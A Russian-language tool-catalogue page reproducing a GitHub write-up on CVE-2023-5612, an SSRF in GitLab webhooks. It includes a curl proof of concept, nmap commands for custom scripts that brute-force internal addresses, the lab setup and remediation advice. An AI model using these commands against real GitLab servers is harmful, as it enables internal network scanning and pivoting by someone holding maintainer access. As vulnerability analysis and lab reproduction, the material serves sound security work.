Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Review.CVE-2023-5612 — Анализ с помощью скрипта CVE-2023-5612 | Kitploit
Инструменты/GitHubGitHub/topskiypavelqwertygang/review.cve-2023-5612
РазведкаКартирование сетиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubtopskiypavelqwertygang/review.cve-2023-5612

Review.CVE-2023-5612

Анализ с помощью скрипта CVE-2023-5612

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
451 год назадЕщё не проверено

CVE-2023-5612 – SSRF в GitLab через URL вебхуков (PoC и анализ)

📌 Обзор CVE

  • CVE-ID: CVE-2023-5612
  • Серьёзность: Высокая (базовая оценка CVSS: 8.1)
  • Тип: Server-Side Request Forgery (SSRF)
  • Компонент: Вебхуки GitLab CE/EE
  • Затронутые версии: GitLab CE/EE < 16.2.7, 16.3 < 16.3.4, 16.4 < 16.4.1

🧠 Описание

Уязвимость SSRF в GitLab CE/EE позволяет злоумышленникам с действительным доступом Project Maintainer отправлять специально сформированные запросы к произвольным внутренним сервисам через вредоносные URL вебхуков. Эксплуатация приводит к сканированию внутренней сети, утечке метаданных или дальнейшему перемещению (pivoting).


✅ Условия эксплуатации

  • У злоумышленника есть maintainer-доступ к проекту
  • GitLab не имеет жесткой фильтрации или валидации URL-хуков

⚙️ Шаги PoC (вручную)

root@kitploit:~
curl -s --header "PRIVATE-TOKEN: <TOKEN>" \
     --data-urlencode "url=http://127.0.0.1:8888" \
     http://<gitlab-host>:8080/api/v4/projects/<project_id>/hooks

🧱 Среда и настройка

root@kitploit:~
- Kali Linux внутри виртуальной машины, развернутой специально под тестирование
- Поднятый через Docker экземпляр уязвимого GitLab CE (порт 8080)
- Внутри GitLab:
- Создан тестовый проект
- Сгенерирован Personal Access Token (glpat-...) с правами Maintainer
- Для внутреннего SSRF-таргета был поднят минимальный HTTP-сервис на 127.0.0.1:8888

🧠 Методология

root@kitploit:~
- Подтверждение уязвимости вручную через curl (см. PoC)
- Создание кастомных NSE-скриптов:
gitlab-ssrf.nse: точечная проверка SSRF
gitlab-ssrf-brute.nse: автоматический перебор внутренних адресов
- Тестирование с nmap -d и --script-trace, для анализа поведения API и фиксации результатов
- Получение отклика 401 Unauthorized от внутреннего сервиса, что указывает на успешный SSRF
- Успешный запрос вернет `201 Created` либо ошибку вида `401 Unauthorized`, что указывает на SSRF-доступ.

🛠 NSE-скрипт (ручной запуск)

root@kitploit:~
nmap -p 8080 \
  --script ./gitlab-ssrf.nse \
  --script-args gitlab.token="<TOKEN>" \
  <target-ip>

🧪 NSE-скрипт (перебор внутренних URL)

root@kitploit:~
nmap -p 8080 \
  --script ./gitlab-ssrf-brute.nse \
  --script-args gitlab.token="<TOKEN>" \
  <target-ip>

📈 Заключение

root@kitploit:~
В ходе работы над уязвимостью **CVE-2023-5612** был воспроизведён успешный SSRF-атакующий сценарий с доступом к внутренним адресам через API GitLab CE. Это демонстрирует, насколько важно ограничивать возможности вебхуков и внедрять валидацию URL-адресов на стороне сервера.

🎯 Цель выполнена:

  • SSRF подтверждён
  • NSE-инструментарий реализован
  • Проект задокументирован и открыт для сообщества

📂 Структура репозитория

root@kitploit:~
.
├── gitlab-ssrf.nse             # NSE script for manual SSRF verification
├── gitlab-ssrf-brute.nse       # NSE brute script to scan internal hosts/ports
├── screenshots/                # Скрины выполнения PoC и подтверждения уязвимости
└── README.md                   # Этот файл

🖼 Скриншоты

  • ✅ Успешный SSRF с возвратом 401 Unauthorized
  • 📜 Логи nmap c отработкой скрипта
  • 📦 Добавление вебхука через API

⚠️ Меры по устранению

  • Обновите GitLab до >= 16.2.7 / 16.3.4 / 16.4.1
  • Ограничить outbound HTTP через egress firewall
  • Использовать internal allow-lists для вебхуков

🧠 Автор и контакты

Pavel Topskiy
GitHub • Аналитик безопасности, аналитик Red Team


📅 Хронология

  • Июнь 2025: Анализ PoC и уязвимости
  • 5 июня 2025: Написание кастомного NSE-скрипта и тестов

🔐 Отказ от ответственности

Все тестирование проводилось в изолированных лабораторных средах на заведомо уязвимых версиях. Не используйте это против несанкционированных систем. Соблюдайте принципы этичного взлома.

Скачать инструмент